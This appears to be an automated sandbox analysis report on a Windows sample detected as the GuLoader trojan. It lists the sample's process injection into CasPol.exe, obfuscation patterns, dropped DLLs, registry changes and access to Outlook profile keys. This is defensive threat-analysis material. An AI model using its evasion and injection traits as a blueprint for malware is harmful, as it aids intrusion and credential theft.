Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032C0976 NtAllocateVirtualMemory, 1_2_032C0976
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032C2463 LoadLibraryA,NtProtectVirtualMemory, 1_2_032C2463
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_1D3CAFDA NtQuerySystemInformation, 4_2_1D3CAFDA
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_1D3CAFB8 NtQuerySystemInformation, 4_2_1D3CAFB8
PE file does not import any functions
Source: lang-1034.dll.1.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: HttpSigUpdate_BaseUrlhttps://go.microsoft.com/fwlink/?LinkID=851034&clcid=0x409&https://go.microsoft.com/fwlink/?LinkID=870379&clcid=0x409&%lsarch=%ls&eng=%ls&avdelta=%ls&asdelta=%ls&prod=%ls&ostype=%u&signaturetype=%u&beta=%u&plat=%lsHttpSigUpdate_UrlSignatureTypeMiscellaneous ConfigurationBddUpdateFailureProductGUIDMpGradualEngineReleaseMpEnginePreventPlatformUpdateRunAsInvoker__COMPAT_LAYEROfflineTargetOS%ls\temp%ls\mpam-%x.exeFileDescriptionAntiMalware Definition UpdateMicrosoft Malware ProtectionProductNameUpdatePlatform.EXEOriginalFilename%lsMpService_NoLowPriUpdateHttpSigUpdate_StubTimeoutx86ia64armarm64 vs SecuriteInfo.com.generic.ml.22865.exe
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMpCommu.dllj% vs SecuriteInfo.com.generic.ml.22865.exe
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreetype.libD vs SecuriteInfo.com.generic.ml.22865.exe
Source: SecuriteInfo.com.generic.ml.22865.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/16@2/2
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe File read: C:\Users\desktop.ini Jump to behavior
Source: SecuriteInfo.com.generic.ml.22865.exe Virustotal: Detection: 8%
Source: SecuriteInfo.com.generic.ml.22865.exe ReversingLabs: Detection: 19%
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe File read: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_1D3CAAB6 AdjustTokenPrivileges, 4_2_1D3CAAB6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_1D3CAA7F AdjustTokenPrivileges, 4_2_1D3CAA7F
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe File created: C:\Users\user\AppData\Local\Temp\nsw143E.tmp Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_004021AA CoCreateInstance, 1_2_004021AA
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 1_2_00404AB5
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:304:WilStaging_02
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6640:120:WilError_03
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe File written: C:\Users\user\AppData\Local\Temp\analysekapitlet.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\spndingsfejlen Jump to behavior
Source: SecuriteInfo.com.generic.ml.22865.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: MpCommu.pdb source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.dr
Source: Binary string: MpCommu.pdbUGP source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9737691704.0000000002917000.00000004.00000800.00020000.00000000.sdmp, MpCommu.dll.1.dr

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000004.00000000.9599862786.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.9740495232.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_716A30C0 push eax; ret 1_2_716A30EE
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B3648 pushfd ; iretd 1_2_032B356D
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B2D62 push edx; ret 1_2_032B2D64
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA99F push eax; iretd 1_2_032BAA73
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA9FD push eax; iretd 1_2_032BAA73
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_1D3C2EF8 pushfd ; iretd 4_2_1D3C2EF9
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_1D4AB38A push esp; retf 4_2_1D4AB429
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_1FF14D88 push ebx; mov dword ptr [esp], eax 4_2_1FF15013
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_1FF15559 push ebx; mov dword ptr [esp], eax 4_2_1FF157B3
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_716A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_716A1BFF
PE file contains sections with non-standard names
Source: libfreetype-6.dll.1.dr Static PE information: section name: .xdata
Source: libpcre-1.dll.1.dr Static PE information: section name: .xdata
Drops PE files
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe File created: C:\Users\user\AppData\Local\Temp\libpcre-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe File created: C:\Users\user\AppData\Local\Temp\nsr150B.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe File created: C:\Users\user\AppData\Local\Temp\MpCommu.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe File created: C:\Users\user\AppData\Local\Temp\lang-1034.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe File created: C:\Users\user\AppData\Local\Temp\libfreetype-6.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
